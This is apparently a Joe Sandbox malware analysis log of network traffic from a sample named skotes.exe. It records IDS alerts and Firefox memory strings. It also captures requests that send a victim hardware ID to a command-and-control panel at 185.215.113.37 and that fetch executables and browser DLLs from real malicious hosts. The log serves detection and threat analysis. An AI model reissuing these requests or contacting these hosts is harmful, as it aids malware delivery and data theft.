Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"20F5399156EA20379026------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="hwid"20F5399156EA20379026------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build"doma------FCAAEBFHJJDAAKFIECGD--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:60982 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:61010 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:61015 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:61014 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:61018 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:61018 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E8BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00E8BE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE b.guid IN (https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.everestjs.net/static/st.v3.js*@mozilla.org/addons/addon-manager-startup;1webcompat-reporter%40mozilla.org:1.5.1*://www.google-analytics.com/analytics.js**://connect.facebook.net/*/all.js*https://smartblock.firefox.etp/facebook.svg*://cdn.branch.io/branch-latest.min.js*https://smartblock.firefox.etp/play.svg*://libs.coremetrics.com/eluminate.js*://www.googletagmanager.com/gtm.js*webcompat-reporter@mozilla.org.xpiFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.criteo.net/js/ld/publishertag.js*://www.google-analytics.com/plugins/ua/ec.js*://static.chartbeat.com/js/chartbeat_video.js*://*.imgur.io/js/vendor.*.bundle.js*://www.google-analytics.com/gtm/js**://ssl.google-analytics.com/ga.js*://pub.doubleverify.com/signals/pub.js**://s0.2mdn.net/instream/html5/ima3.js*://auth.9c9media.ca/auth/main.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://connect.facebook.net/*/sdk.js**://www.googletagservices.com/tag/js/gpt.js**://www.rva311.com/static/js/main.*.chunk.js*://*.imgur.com/js/vendor.*.bundle.jsFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://track.adform.net/serving/scripts/trackpoint/*://web-assets.toggl.com/app/assets/scripts/*.jspictureinpicture%40mozilla.org:1.0.0 No attachments in IDB cache. Nothing to do. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3122697624.0000028824B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php**://pubads.g.doubleclick.net/gampad/*xml_vmap2**://ads.stickyadstv.com/auto-user-sync**://*.adsafeprotected.com/services/pub*color-mix(in srgb, currentColor 9%, transparent)--autocomplete-popup-separator-color--panel-banner-item-info-icon-bgcolorresource://builtin-addons/search-detection/blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
